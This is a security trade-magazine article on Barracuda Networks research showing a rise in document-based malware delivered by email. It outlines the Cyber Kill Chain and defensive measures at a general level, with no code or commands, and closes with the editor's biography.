Barracuda Networks urges businesses to guard against evolving malware attacks

Barracuda Networks researchers have uncovered an alarming new rise in the use of document-based malware. A recent e-mail analysis revealed that 48% of all malicious files detected in the last 12 months were some kind of document. More than 300,000 unique malicious documents were identified.

Since the beginning of 2019, however, these types of document-based attacks have increased in frequency and dramatically so. In the first quarter of the year, 59% of all malicious files detected were documents compared to 41% in 2018.

Cyber criminals use e-mail to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.

After decades of relying on signature-based methods, which could only be effective at stopping a malware strain once a signature was derived from it, security companies now think about malware detection by asking the question: “What makes something malicious?” rather than: “How do I detect things I know are malicious?” The focus is on attempting to detect indicators that a file might do harm before it’s labelled as being harmful.

The Cyber Kill Chain

A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:

*Reconnaissance: Target selection and research

*Weaponisation: Crafting the attack on the target, often using malware and/or exploits

*Delivery: Launching the attack

*Exploitation: Using exploits delivered in the attack package

*Installation: Creating persistence within the target’s system

*Command and Control: Using the persistence from outside the network

*Actions on objective: Achieving the objective that was the purpose of the attack (often exfiltration of data)

Most malware is sent as spam to widely-circulated e-mail lists that are sold, traded, aggregated and revised as they move through The Dark Web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.

Now that the attacker has a list of potential victims, the malware campaign (ie the delivery phase of the Cyber Kill Chain) can commence, using social engineering to entice users to open an attached malicious document. Microsoft and Adobe file types are the most commonly used in document-based malware attacks, including Word, Excel, PowerPoint, Acrobat and PDF files.

Once the document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks. The executable being downloaded and run when the malicious document is opened represents an installation phase in the Cyber Kill Chain.

Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to try to confuse users and cajole them to open malicious documents.

Detection and blocking

Modern malware attacks are complex and layered, as are the solutions designed to detect and block them.

*Blacklists: With IP space becoming increasingly limited, spammers are using their own infrastructure. Often, the same IPs are used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it’s possible to temporarily block attacks by IP once a large enough volume of spam has been detected.

*Spam filters/phishing detection systems: While many malicious e-mails appear convincing, spam filters, phishing detection systems and related security software can pick up subtle clues and help to block potentially threatening messages and attachments from reaching e-mail inboxes.

*Malware detection: For e-mails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious.

*Advanced firewall: If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.

About the Author
Brian Sims BA (Hons) Hon FSyI, Editor, Risk UK (Pro-Activ Publications) Beginning his career in professional journalism at The Builder Group in March 1992, Brian was appointed Editor of Security Management Today in November 2000 having spent eight years in engineering journalism across two titles: Building Services Journal and Light & Lighting. In 2005, Brian received the BSIA Chairman’s Award for Promoting The Security Industry and, a year later, the Skills for Security Special Award for an Outstanding Contribution to the Security Business Sector. In 2008, Brian was The Security Institute’s nomination for the Association of Security Consultants’ highly prestigious Imbert Prize and, in 2013, was a nominated finalist for the Institute's George van Schalkwyk Award. An Honorary Fellow of The Security Institute, Brian serves as a Judge for the BSIA’s Security Personnel of the Year Awards and the Securitas Good Customer Award. Between 2008 and 2014, Brian pioneered the use of digital media across the security sector, including webinars and Audio Shows. Brian’s actively involved in 50-plus security groups on LinkedIn and hosts the popular Risk UK Twitter site. Brian is a frequent speaker on the conference circuit. He has organised and chaired conference programmes for both IFSEC International and ASIS International and has been published in the national media. Brian was appointed Editor of Risk UK at Pro-Activ Publications in July 2014 and as Editor of The Paper (Pro-Activ Publications' dedicated business newspaper for security professionals) in September 2015. Brian was appointed Editor of Risk Xtra at Pro-Activ Publications in May 2018.

Related Posts